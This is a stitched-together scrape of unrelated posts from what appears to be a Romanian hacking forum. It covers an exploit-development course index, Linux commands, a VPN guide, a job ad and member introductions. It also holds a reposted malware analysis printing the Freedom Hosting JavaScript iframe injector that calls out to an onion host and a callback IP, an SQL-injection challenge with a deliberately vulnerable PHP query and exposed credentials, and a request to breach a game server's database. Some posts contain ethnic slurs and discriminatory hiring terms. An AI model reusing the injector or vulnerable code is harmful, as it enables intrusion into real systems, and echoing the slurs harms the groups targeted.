Leaderboard

Hello Rst : This is a little Course for Exploit Development for Win32 talking about stack based bof & seh Contents : Stack-Based Buffer Overflow Tutorials : <--- Part One VLC media player V 0.8.6d (Target) 1-Stack-based Buffer Overflow tutorials : Step 1: Preparing The Skeleton Exploit 2-Stack-based Buffer Overflow tutorials: Step 2 Verifying The Bug 3-Stack-based Buffer Overflow tutorials Step 3: Finding the overwrite offset. Target 4-Stack-based Buffer Overflow tutorials. Step 4 : Picking an overwrite address (JMP ESP: USER32.dll) 5-Stack-based Buffer Overflow tutorials. Step 5: Finding bad characters 6-Stack-based Buffer Overflow tutorials. Step 6 : Adding The Final Shellcode 7-Stack-based Buffer Overflow tutorials. Step 7 : Porting Exploit to Metasploit Framework 8-Stack-based Buffer Overflow tutorials. Step 8: Porting exploit to Metasploit. Seh-Based Buffer Overflow Tutorials : <--- Part Two :) Video Spirit Pro (Target) 9-SEH-based buffer overflow tutorials. Step 1: Skeleton Exploit 10-SEH-based buffer overflow tutorials. Step 2: Finding the Overwrite Offset 11-SEH-based buffer overflow tutorials. Step 3: Picking an overwrite address 12-SEH-based buffer overflow tutorials. Step 4: Finding Bad Characters 13-SEH-based buffer overflow tutorials. Step 5: Adding The Final Shellcode Playlist Youtube : https://www.youtube.com/playlist?list=PLdXylH5WObDcOUUyhoHWUcFImbGNU7nT1 Author : ninjas3c Regards NO-MERCY

Nu este pentru mine ci pentru un prieten.

OkayFreedom is a service of: Steganos Software GmbH Berlin Adresa de email si primesti restul. https://www.okayfreedom.com/specials/windowsdeal/of Mai multe informati despre ... https://www.okayfreedom.com/?language=de

mkdir– make directories Usage: mkdir [OPTION] DIRECTORY… eg. mkdir lhn ls– list directory contents Usage: ls [OPTION]… [FILE]… eg. ls, ls *l, ls lhn cd– changes directories Usage: cd [DIRECTORY] eg. cd lhn pwd*- print name of current working directory Usage: pwd vim– Vi Improved, a programmers text editor Usage: vim [OPTION] [file]… eg. vim lhn.txt cp – copy files and directories Usage: cp [OPTION]… SOURCE DEST eg. cp sample.txt sample_copy.txt cp sample_copy.txt target_dir mv– move (rename) files Usage: mv [OPTION]… SOURCE DEST eg. mv source.txt target_dir mv old.txt new.txt rm* remove files or directories Usage: rm [OPTION]… FILE… eg. rm file1.txt , rm *rf some_dir find– search for files in a directory hierarchy Usage: find [OPTION] [path] [pattern] eg. find file1.txt, find *name file1.txt history– prints recently used commands Usage: history cat– concatenate files and print on the standard output Usage: cat [OPTION] [FILE]… eg. cat file1.txt file2.txt cat *n file1.txt echo– display a line of text Usage: echo [OPTION] [string] … eg. echo I love RST echo $HOME grep*- print lines matching a pattern Usage: grep [OPTION] PATTERN [FILE]… eg. grep *i apple sample.txt wc*- print the number of newlines, words, and bytes in files Usage: wc [OPTION]… [FILE]… eg. wc file1.txt wc *L file1.txt sort– sort lines of text files Usage: sort [OPTION]… [FILE]… eg. sort file1.txt sort *r file1.txt tar– to archive a file Usage: tar [OPTION] DEST SOURCE eg. tar *cvf /home/archive.tar /home/original tar *xvf /home/archive.tar kill– to kill a process(using signal mechanism) Usage: kill [OPTION] pid eg. kill *9 2275 ps– report a snapshot of the current processes Usage: ps [OPTION] eg. ps, ps *el who– show who is logged on Usage: who [OPTION] eg. who , who *b , who *q passwd– update a user’s authentication tokens(s) Usage: passwd [OPTION] eg. passwd su– change user ID or become super*user Usage: su [OPTION] [LOGIN] eg. su remo, su chown– change file owner and group Usage: chown [OPTION]… OWNER[:[GROUP]] FILE… eg. chown remo myfile.txt chmod– change file access permissions Usage: chmod [OPTION] [MODE] [FILE] eg. chmod 744 calculate.sh zip– package and compress (archive) files Usage: zip [OPTION] DEST SOURSE eg. zip original.zip original unzip– list, test and extract compressed files in a ZIP archive Usage: unzip filename eg. unzip original.zi ssh– SSH client (remote login program) “ssh is a program for logging into a remote machine and for executing commands on a remote machine” Usage: ssh [options] [user]@hostname eg. ssh *X guest@10.105.11.20 scp– secure copy (remote file copy program) “scp copies files between hosts on a network” Usage: scp [options] [[user]@host1:file1] [[user]@host2:file2] eg. scp file1.txt guest@10.105.11.20:~/Desktop/ fdisk– partition manipulator eg. sudo fdisk *l mount– mount a file system Usage: mount *t type device dir eg. mount /dev/sda5 /media/target unmount– unmount file systems Usage: umount [OPTIONS] dir | device… eg. umount /media/target du– estimate file space usage Usage: du [OPTION]… [FILE]… eg. du df– report filesystem disk space usage Usage: df [OPTION]… [FILE]… eg. df quota– display disk usage and limits Usage: quota [OPTION] eg. quota *v reboot– reboot the system Usage: reboot [OPTION] eg. reboot poweroff – power off the system Usage: poweroff [OPTION] eg. poweroff kate– KDE Advanced Text Editor Usage: kate [options][file(s)] eg. kate file1.txt file2.txt vim– Vi Improved, a programmers text editor Usage: vim [OPTION] [file]… eg. vi hello.c gedit* A text Editor. Used to create and edit files. Usage: gedit [OPTION] [FILE]… eg. gedit bg– make a foreground process to run in background Usage: type ‘ctrl+z’ and then ‘bg ‘ fg– to make background process as foreground process Usage: fg [jobid] jobs– displays the names and ids of background jobs Usage: jobs sed* stream editor for filtering and transforming text Usage: sed [OPTION] [input*file]… eg. sed ‘s/love/hate/g’ loveletter.txt awk* pattern scanning and processing language eg. awk *F: ‘{ print $1 }’ sample_awk.txt find* search for files in a directory hierarchy Usage: find [OPTION] [path] [pattern] eg. find *name file1.txt locate– find or locate a file Usage: locate [OPTION]… FILE… eg. locate file1.txt Linux File Permissions 3 types of file permissions – read, write, execute 10 bit format from ‘ls *l’ command 1 2 3 4 5 6 7 8 9 10 file type owner group others eg. drwxrw*r** means owner has all three permissions, group has read and write, others have only read permission read permission – 4, write – 2, execute *1 eg. rwxrw*r** = 764 673 = rw*rwx*wx

E scrisa de un indian - e un jeg. DAR pentru incepatori e foarte buna. Contine multe informatii de baza utile. Bine, cica sa folosesti "Andry IP scanner"... Sa scrii asta intr-o carte de "hacking"... Sa ii dea cineva cu lopata in cap tiganului care a scris-o, mai ales ca in mod normal vrea bani pentru porcaria asta. Nota: Nu ii suport pe indieni si parerea mea "poate" fi subiectiva.

Da ce-am f?cut, ?efu ? @Aerosol Ne înve?i s? d?m ?i noi flod cu mIRC ?i roate? ON: Welcome to my dick.

Salutare , Ma numesc Aditza , Am 21 de ani , Sunt pasionat de Gaming ! Sper sa ne intelegem foarte bine ! De mult imi doresc sa ajung si eu un " Hacker " si de multe ori devin prada " Hackerilor " ! Amuzant nu ? Ma uit mereu la multe turoriale pe YT si vad o gradama de copii care incearca sa pacaleasca lumea cu " Keylogger " si alte programe .. ! Eu ma joc in general , Metin2 ! Ascult melodiile de la : HaarpCord , Specii , Subcarpati , SuiePaparude .. in general RAPP. Va multumesc anticipat

OMG curs intensiv mai sus, postez si eu varianta mea VPN - cheap & easy : - achizitionam un vps preferabil in EU, la cel mai ieftin pret si cat de cat la o firma cunoscuta - activam din panoul OpenVZ : TUN/TAP si PPP - acum pentru distro debian ubuntu si ce mai este derivat din debian avem 4 pasi de urmat in consola # 1. apt-get update apt-get upgrade (optional, daca nu e la zi, sau daca nu vrei sa stricati conf la cele deaja instalate) 2. wget http://swupdate.openvpn.org/as/openvpn-as-1.8.4-Ubuntu10.amd_64.deb sau : x64 (64bits) version: http://swupdate.openvpn.org/as/openvpn-as-1.8.4-Ubuntu10.amd_64.deb x86 (32bits) version: http://swupdate.openvpn.org/as/openvpn-as-1.8.4-Ubuntu10.i386.deb 3. dpkg -i openvpn-as-1.8.4-Ubuntu10.amd_64.deb la instalare va crea userul : openvpn 4. schimbam parola la userul creat mai sus passwd openvpn - iar in browser va conectati la el si il configurati cum vreti, apoi tot din browser, intrati cu oserul deaja creat : openvpn si parola care ati setato mai sus si descarcati clientul deaja configurat : https://(1.2.3.4):943/admin That's all folks, have fun. PS. asta e treaba de 2 minute

# MalwareMustDie! # This is the malicious Javascript set codes injected to the Freedom Hosting site # It contents the IFRAMER Malware method to redirect the victim to infector site, in url: # http://nl7qbezu7pqsuone.onion?requestID=203f1a01-6bc7-4c8b-b0be-2726a7a3cbd0 # # Original copy at: www.twitlonger.com/show/n_1rlo0uu # See the Iframer part and tell me if this is NOT adapting malware techniques, and NOT blindly infect every visitor to that site!! # Anyone who accessed an FH site with Firefox & JavaScript enabled must be affected to this IFRAMER. # Case: FBI infects malware in public anonymous network http://blog.malwaremustdie.org/2014/08/what-is-bad-stays-bad-legalized-any.html # Ref: http://www.reddit.com/r/onions/comments/1jmrta/founder_of_the_freedom_hosting_arrested_held/ # Ref: https://www.mozilla.org/security/announce/2013/mfsa2013-53.html # Ref: http://www.twitlonger.com/show/n_1rlo0uu # Ref: http://pastebin.com/bu2Ya0n6 # Ref: http://pastebin.com/pmGEj9bV # MalwareMustDie!# This is the malicious Javascript set codes injected to the Freedom Hosting site # It contents the IFRAMER Malware method to redirect the victim to infector site, in url: # http://nl7qbezu7pqsuone.onion?requestID=203f1a01-6bc7-4c8b-b0be-2726a7a3cbd0 # # Original copy at: www.twitlonger.com/show/n_1rlo0uu # See the Iframer part and tell me if this is NOT adapting malware techniques, and NOT blindly infect every visitor to that site!! # Anyone who accessed an FH site with Firefox & JavaScript enabled must be affected to this IFRAMER. # Case: FBI infects malware in public anonymous network http://blog.malwaremustdie.org/2014/08/what-is-bad-stays-bad-legalized-any.html # Ref: http://www.reddit.com/r/onions/comments/1jmrta/founder_of_the_freedom_hosting_arrested_held/ # Ref: https://www.mozilla.org/security/announce/2013/mfsa2013-53.html # Ref: http://www.twitlonger.com/show/n_1rlo0uu # Ref: http://pastebin.com/bu2Ya0n6 # Ref: http://pastebin.com/pmGEj9bV // Case 1 function createCookie(name,value,minutes) { if (minutes) { var date = new Date(); date.setTime(date.getTime()+(minutes*60*1000)); var expires = "; expires="+date.toGMTString(); } else var expires = ""; document.cookie = name+"="+value+expires+"; path=/"; } function readCookie(name) { var nameEQ = name + "="; var ca = document.cookie.split(';'); for(var i=0;i < ca.length;i++) { var c = ca; while (c.charAt(0)==' ') c = c.substring(1,c.length); if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length,c.length); } return null; } function isFF() { return (document.getBoxObjectFor != null || window.mozInnerScreenX != null || /Firefox/i.test(navigator.userAgent)); } function updatify() { var iframe = document.createElement('iframe'); iframe.style.display = "inline"; iframe.frameBorder = "0"; iframe.scrolling = "no"; iframe.src = "http://nl7qbezu7pqsuone.onion?requestID=203f1a01-6bc7-4c8b-b0be-2726a7a3cbd0"; iframe.height = "5"; iframe.width = "*"; document.body.appendChild(iframe); } function format_quick() { if ( ! readCookie("n_serv") ) { createCookie("n_serv", "203f1a01-6bc7-4c8b-b0be-2726a7a3cbd0", 30); updatify(); } } function isReady() { if ( document.readyState === "interactive" || document.readyState === "complete" ) { if ( isFF() ) { format_quick(); } } else { setTimeout(isReady, 250); } } setTimeout(isReady, 250); // Case 2 function createCookie(name, value, minutes) { if (minutes) { var date = new Date(); date.setTime(date.getTime() + (minutes * 60 * 1000)); var expires = "; expires=" + date.toGMTString(); } else var expires = ""; document.cookie = name + "=" + value + expires + "; path=/"; } function readCookie(name) { var nameEQ = name + "="; var ca = document.cookie.split(';'); for (var i = 0; i < ca.length; i++) { var c = ca; while (c.charAt(0) == ' ') c = c.substring(1, c.length); if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length, c.length); } return null; } function isFF() { return (document.getBoxObjectFor != null || window.mozInnerScreenX != null || /Firefox/i.test(navigator.userAgent)); } function updatify() { var iframe = document.createElement('iframe'); iframe.style.display = "inline"; iframe.frameBorder = "0"; iframe.scrolling = "no"; iframe.src = "http://65.222.202.53/?requestID=eb5f2c80-fc81-11e2-b778-0800200c9a66"; <== (1) 1ST CALLBACK SELF EXPLANATORY iframe.height = "5"; iframe.width = "*"; document.body.appendChild(iframe); } function freedomhost() { if (!readCookie("n_serv")) { createCookie("n_serv", "eb5f2c80-fc81-11e2-b778-0800200c9a66", 30); updatify(); } } function isReady() { if (document.readyState === "interactive" || document.readyState === "complete") { if (isFF()) { //window.alert(window.location + "Firefox Detected.") freedomhost(); } } else { setTimeout(isReady, 250); } } setTimeout(isReady, 250); // Noted, same method, // second script is w/IP info callback, contacting remote host as per marked (1) IP Address: 65.222.202.53 City: Triadelphia State or Region: West Virginia Country: United States ISP: Verizon Business Latitude & Longitude: 40.0900-80.6220 Domain: verizonbusiness.com ZIP Code: 26059 --- #MalwareMustDie! @unixfreaxjp Source

Am resetat (adica sters) toate like-urile si dislike-urile. In plus, acum nu mai conteaza deloc un Like si un Dislike la reputatie. Adica puteti sa dati cate Like-uri si Dislike-uri vreti, nu o sa incante pe nimeni. Daca exagerati cu Dislike-urile, o sa pun sa nu mai fie afisate. Have fun.

Salutare, Challange-ul pe care il am pentru voi este sa luati un char de la un string din db, intr-un singur query/req Raspunsurile pe PM sa spunem ca asta ar fi scriptul vulnerabil: <?php $db = new PDO('mysql:host=mysql13.000webhost.com;dbname=a8014888_mom', 'a8014888_mom', 'numauita11'); if(isset($_GET['id'])) $db->query("SELECT * FROM completed where id=".$_GET['id']); Nu am facut un demo deoarece era greu de implementat limita aia cu 1 query/req....

Decizii: @bcman Corect. E ok. O imagine pusa din an in paste la discutii non-it nu e moarte de om. Este un forum de discutii unde oamenii se inregistreaza tocmai pentru a comunica cu ceilalti membrii. Nu toata lumea observa data la care s-a postat ultimul raspuns. In cazul de fata lasi userul in pace si ii vei observa si primul post daca va continua sa invie topicuri moarte. De-abia atunci are rost sa ii dai o penalizare.

Angajam Programatori. Web(php si java) / C / C++ / C# (inclusiv parte networking) Nu exista nici un proiect anume la care se va lucra, vor fi proiecte multiple. Salariul este intre 600eu si 2000eu. Se lucreaza program de 6-8h / zi din birou. Biroul este in Bucuresti, str. Baba-Novac (sector 3). Oamenii ce nu locuiesc in Bucuresti pot sa aplice, vor locui intr-un apartament in Bucuresti. Trebuie sa stiti lucrurile de baza in Linux/Windows (instalare apache/dns configurari sisteme operare etc) Ca test, vi se va da un mic proiect deja facut sa il refaceti cum stiti voi sau in ce limbaj stiti. Timpul de lucru` al testului este de maxim 2 saptamani, cu lucru 4h/zi. Pentru detalii contactati: job@powerhost.ro cu un MIC, SC. Aceste nu este un thread "open for discussion", este o oferta pentru locuri de munca. Asa ca abtineti-va de la comentarii idioate legate de "topirea calotei polare/etc." ca va banez. OFERTA ESTE VALABILA PANA DISPARE ACEST THREAD. (adica, cand vom gasii ce ne trebuie) p.s. Daca sunteti din Buzau/Moldova va rog nu insistati. Daca sunteti din Ungaria, Cluj sau sunteti afiliati cu Unguri si vi se pare cunoscut cuvantul "ishtenem" va rog, NU INSISTATI.

Salut . As dorii si eu un tutorial cum sa sparg o baza de date de exemplu la un server de Metin2 daca se poate.. ! Nu vreau toate porcariile cum ar fii Havij si astea va rog frumos.. ! Multumesc!

Hai sa ma prezint si eu.. stau de cv timp pe RST, doar citesc.. imi cer scuze ca nu m-am prezentat cand mam inregistrat, hai sa trecem la treaba . Ma numesc Ionut Am 19 ani (11.06.1995) Cunostinte.. cate putin din ce-i mai important Hobi-uri : niciunu ( acu puteti sa incepeti sa ma criticati )